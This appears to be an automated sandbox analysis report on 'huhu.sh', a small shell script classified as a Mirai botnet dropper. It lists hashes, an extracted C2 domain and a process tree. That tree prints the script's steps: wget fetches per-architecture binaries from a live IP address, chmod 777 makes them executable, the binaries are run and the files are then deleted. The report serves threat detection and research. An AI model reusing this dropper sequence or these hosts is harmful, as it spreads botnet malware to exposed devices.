Overview

overview

10

Static

static

1

huhu.sh

ubuntu-18.04-amd64

10

huhu.sh

debian-9-armhf

10

huhu.sh

debian-9-mips

10

huhu.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    7s
  • max time network
    9s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    03-02-2025 20:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    huhu.sh

  • Size

    612B

  • MD5

    03e98be4a12a9568c29a2af67f0203e6

  • SHA1

    4081ba65d287eb000bc8acf85450576502f320c0

  • SHA256

    28dc0d138ce29791960807af2751f548f052071ea8bd97978844fd41bd6716fa

  • SHA512

    c544a875edc33cd939ff88737d1a04a59181a0fd2febc6742b8e6412640e975c02e4430c5f88ed8217de48ef9187b3a68a7524be71b7191b8fc76c8c30764f6b

Score
10/10
miraibotnetdefense_evasion

Malware Config

Extracted

Family

mirai

C2

gay.nguyenletriloc.pro

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs

Processes

  • /tmp/huhu.sh
    /tmp/huhu.sh
    1⤵
    • Executes dropped EXE
    PID:712
    • /bin/rm
      rm -rf main_arm
      2⤵
        PID:715
      • /usr/bin/wget
        wget http://80.76.51.164/main_arm -O -
        2⤵
          PID:717
        • /bin/chmod
          chmod 777 main_arm
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /main_arm
          ./main_arm pdvr
          2⤵
            PID:730
          • /bin/rm
            rm -rf main_arm
            2⤵
              PID:734
            • /bin/rm
              rm -rf main_arm5
              2⤵
                PID:735
              • /usr/bin/wget
                wget http://80.76.51.164/main_arm5 -O -
                2⤵
                  PID:737
                • /bin/chmod
                  chmod 777 main_arm5
                  2⤵
                  • File and Directory Permissions Modification
                  PID:745
                • /main_arm5
                  ./main_arm5 pdvr
                  2⤵
                    PID:746
                  • /bin/rm
                    rm -rf main_arm5
                    2⤵
                      PID:748
                    • /bin/rm
                      rm -rf main_arm6
                      2⤵
                        PID:749
                      • /usr/bin/wget
                        wget http://80.76.51.164/main_arm6 -O -
                        2⤵
                          PID:751
                        • /bin/chmod
                          chmod 777 main_arm6
                          2⤵
                          • File and Directory Permissions Modification
                          PID:753
                        • /main_arm6
                          ./main_arm6 pdvr
                          2⤵
                            PID:754
                          • /bin/rm
                            rm -rf main_arm6
                            2⤵
                              PID:756
                            • /bin/rm
                              rm -rf main_arm7
                              2⤵
                                PID:757
                              • /usr/bin/wget
                                wget http://80.76.51.164/main_arm7 -O -
                                2⤵
                                  PID:758
                                • /bin/chmod
                                  chmod 777 main_arm7
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:759
                                • /main_arm7
                                  ./main_arm7 pdvr
                                  2⤵
                                    PID:760
                                  • /bin/rm
                                    rm -rf main_arm7
                                    2⤵
                                      PID:762
                                    • /bin/rm
                                      rm /tmp/huhu.sh
                                      2⤵
                                        PID:763

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • /main_arm
                                      Filesize

                                      130KB

                                      MD5

                                      ea04094bf0f18047c4bfdb570b8bc339

                                      SHA1

                                      e968d1c312c0ae549b246572761227b62c438bc7

                                      SHA256

                                      b96ddaa05b3e4f2f827dc34f082b703c0ffba80f80ca4c8b502af3cf74f3f51d

                                      SHA512

                                      0f11722b737c98d8cec00d23f29d4f9589b0511ccbdc0d4e984fe154c8d14b39157540393ce0b0309f10672c2ab371e5313a8c91b102f526335b1286a4e57a1f

                                      Download Submit

                                    • /main_arm5
                                      Filesize

                                      126KB

                                      MD5

                                      188b7e2886ceb67b5de635c72b4377cd

                                      SHA1

                                      5dde7e770dd94b7077794b30ee340f87630a8572

                                      SHA256

                                      3f74ae49e4101de58f98982358cafab767a1d90222c6ccba536e57c580b7b377

                                      SHA512

                                      bce91f75188c99ca7a71658b2815840c14949a15db9ac0d6a7cbe3c4aba6ffe92965049953dc7c3a17dbd31f2f69a79f24ac57e61d72f78aba1900781029987f

                                      Download Submit

                                    • /main_arm6
                                      Filesize

                                      141KB

                                      MD5

                                      447f0e23f58bf497e2ae1c103dec482e

                                      SHA1

                                      edd209ceeafc7fe0987e4844fec9f170c02bdcb5

                                      SHA256

                                      71e5b3b550834ebf379c37f7f18a85825bf51a2bfb15ec01b41fd1f782b6a649

                                      SHA512

                                      ab451e7a3c9add9d6f6de31d592bbae9d2a3cb79ecf9e73815d5ddb45ae74113078934a7066cf5133078686935dc27cb80b5286e7fa74760143870fc4d3014d0

                                      Download Submit

                                    • /main_arm7
                                      Filesize

                                      179KB

                                      MD5

                                      1c3bd0890fa6cbf314ec2cdc698fc1c8

                                      SHA1

                                      f165ecadfa8e07182029ab8cb8a6329b9574a795

                                      SHA256

                                      021af5763cd627a513838dcde0247979598f8f8efcf66ce4abf9a54fb5f64e4e

                                      SHA512

                                      aab772c56a231e14b0b0bf9fbc328b8d750ad0743db9426c8078420b01c85aeb2737d59d47e34ba3471869f65483591fe7b0de24720647db086c68e0001f335c

                                      Download Submit